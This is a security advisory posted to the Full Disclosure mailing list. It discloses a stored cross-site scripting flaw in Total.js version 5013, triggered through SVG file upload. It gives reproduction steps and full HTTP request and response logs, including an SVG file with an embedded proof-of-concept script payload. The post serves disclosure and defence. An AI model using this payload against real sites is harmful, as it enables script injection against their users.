Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 26 Oct 2025 17:55:30 +0000
# Exploit Title: Stored Cross-Site Scripting (XSS) via SVG File Upload -
totaljsv5013
# Date: 10/2025
# Exploit Author: Andrey Stoykov
# Version: 5013
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-46-stored.html


Stored Cross-Site Scripting (XSS) via SVG File Upload:

Steps to Reproduce:
1. Login with user and visit "Layouts"
2. Visit "Files" and click "Upload"
3. Upload SVG image file with the contents below
4. The payload would execute upon clicking "Download"

// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg"; viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--

// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]

// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg"; viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: